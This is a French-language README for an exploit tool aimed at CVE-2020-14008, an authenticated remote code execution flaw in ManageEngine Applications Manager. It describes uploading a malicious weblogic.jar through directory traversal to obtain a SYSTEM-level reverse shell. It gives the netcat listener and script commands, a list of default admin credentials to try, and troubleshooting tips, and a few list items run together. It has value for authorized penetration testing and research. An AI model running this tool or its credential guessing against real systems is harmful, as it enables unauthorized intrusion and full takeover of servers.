
CVE-2020-14008 - RCE dans ManageEngine Applications Manager
Exécution de code à distance authentifiée via un téléchargement arbitraire de fichiers dans Zoho ManageEngine Applications Manager (versions <= 14720).
| Détail | Valeur |
|---|
| CVE | CVE-2020-14008 |
| CVSS | 7.2 (Élevé) |
| Type | RCE authentifiée / Téléchargement arbitraire de fichiers |
| Produit | Zoho ManageEngine Applications Manager |
| Affecté | Versions 14720 et inférieures |
| Prérequis | Identifiants administrateur valides |
| Résultat | Reverse shell au niveau SYSTEM |
L'exploit abuse de la fonctionnalité de test des identifiants du moniteur Weblogic. Un administrateur authentifié télécharge un fichier weblogic.jar malveillant vers le chemin de bibliothèque Weblogic attendu. Lorsque le test d'identifiants est déclenché, ManageEngine charge weblogic.jndi.Environment depuis le JAR téléchargé via JarLoader.loadClass() et newInstance(), exécutant du code Java arbitraire.
javac et jar dans le PATH)nc (netcat) pour capturer le reverse shellpip3 install requests urllib3 lxml
nc -lvnp 1337
python3 cve-2020-14008.py <URL> <USERNAME> <PASSWORD> <LHOST> <LPORT>
# Basique
python3 cve-2020-14008.py https://192.168.100.2:8443 admin admin 192.168.100.3 1337
weblogic.jndi.Environment) contenant un reverse shell dans weblogic.jarclasses/weblogic/version8/ via une traversée de répertoire (solution de repli : créer une tâche planifiée pour le déplacer)/testCredential.do, qui charge et instancie la classe malveillante| Identifiant | Mot de passe |
|---|---|
| admin | admin |
| admin | password |
| administrator | administrator |
| guest | guest |
| Erreur | Solution |
|---|---|
release version 7 not supported | Java 21+ a abandonné la cible Java 7. Le script utilise --release 8 |
FileNotFoundError: weblogic.jar | La compilation du JAR a échoué. Vérifiez que javac et jar sont dans le PATH |
No valid response from used session | Identifiants invalides |
Actionname not found | La création de la tâche a échoué, vérifiez les permissions administrateur |
Cet outil est fourni uniquement pour les tests de pénétration autorisés et la recherche en sécurité. Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas la permission de tester est illégale.